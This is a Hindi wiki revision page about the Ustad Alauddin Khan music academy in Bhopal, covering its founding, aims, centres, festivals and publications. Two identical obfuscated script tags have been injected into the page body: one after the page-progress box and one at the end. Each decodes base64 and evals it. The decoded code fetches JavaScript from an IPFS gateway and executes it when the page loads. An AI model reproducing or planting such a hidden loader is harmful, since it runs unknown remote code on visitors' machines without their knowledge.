Difference between revisions of "उस्ताद अलाउद्दीन ख़ाँ संगीत अकादमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''उस्ताद अलाउद्दीन ख़ाँ संगीत अकादमी''' भोपाल, मध्...' के साथ नया पृष्ठ बनाया)
 
 
Line 1: Line 1:
'''उस्ताद अलाउद्दीन ख़ाँ संगीत अकादमी''' [[भोपाल]], [[मध्य प्रदेश]] में स्थित है। इस अकादमी की स्थापना सन [[1979]] में की गई थी। इसका उद्देश्य उस्ताद अलाउददीन खां के अवदान और परम्परा का अध्ययन, विस्तार और परिरक्षण के साथ-साथ हिन्दुस्तानी संगीत और शास्त्रीय नृत्य के उच्च स्तरीय प्रशिक्षण, दुर्लभ संगीत शैलियों के पुनराविष्कार करना है।
+
'''उस्ताद अलाउद्दीन ख़ाँ संगीत अकादमी''' [[भोपाल]], [[मध्य प्रदेश]] में स्थित है। इस अकादमी की स्थापना सन [[1979]] में की गई थी। इसका उद्देश्य [[अलाउद्दीन ख़ाँ|उस्ताद अलाउददीन ख़ाँ]] के अवदान और परम्परा का अध्ययन, विस्तार और परिरक्षण के साथ-साथ हिन्दुस्तानी संगीत और शास्त्रीय नृत्य के उच्च स्तरीय प्रशिक्षण, दुर्लभ संगीत शैलियों के पुनराविष्कार करना है।
  
 
*अकादमी के अंतर्गत [[शास्त्रीय संगीत]], दुर्लभ [[ध्रुपद]] गायन शैली के संदर्भ में ध्रुपद केन्द्र और [[रायगढ़ घराना]] की [[कथक]] शैली के संदर्भ में चक्रधर नृत्य केन्द्र भी अध्ययन और अनुशीलन के सक्रिय मंच के रूप में कार्यरत हैं।
 
*अकादमी के अंतर्गत [[शास्त्रीय संगीत]], दुर्लभ [[ध्रुपद]] गायन शैली के संदर्भ में ध्रुपद केन्द्र और [[रायगढ़ घराना]] की [[कथक]] शैली के संदर्भ में चक्रधर नृत्य केन्द्र भी अध्ययन और अनुशीलन के सक्रिय मंच के रूप में कार्यरत हैं।

Latest revision as of 08:07, 28 June 2018

ustad alauddin khaan sangit akadami bhopal, madhy pradesh mean sthit hai. is akadami ki sthapana san 1979 mean ki gee thi. isaka uddeshy ustad alaudadin khaan ke avadan aur parampara ka adhyayan, vistar aur parirakshan ke sath-sath hindustani sangit aur shastriy nrity ke uchch stariy prashikshan, durlabh sangit shailiyoan ke punaravishkar karana hai.

  • akadami ke aantargat shastriy sangit, durlabh dhrupad gayan shaili ke sandarbh mean dhrupad kendr aur rayagadh gharana ki kathak shaili ke sandarbh mean chakradhar nrity kendr bhi adhyayan aur anushilan ke sakriy manch ke roop mean karyarat haian.
  • chakradhar nrity samaroh, ustad alauddin khaan sangit samaroh aur ustad amir khaan samaroh isake mukhy ayojan hai.
  • alauddin khaan vyakhyanamala, durlabh vady vinod, chakradhar samaroh, rayagadh dhrupad samaroh, kathak prasang, alauddin khaan smriti sangit samaroh (mehar), amir khan samaroh (iandaur) adi karyakramoan ka ayojan karana is sansthan ka kary hai.
  • yah sansthan prakashan ke kshetr mean bhi kary karata hai. samay-samay par prakashit smarikaean, 'meri katha' (ustad alauddin khaan, rajab ali khan (amik hanaphali), 'kumar gandharv' (ashok bajapeee rayagadh mean), 'katthak et d seantar', hiandi anuvad (mohan nadakarni), 'madhyavarti' (sunil trivedi) adi is prakashan ki pustakean haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>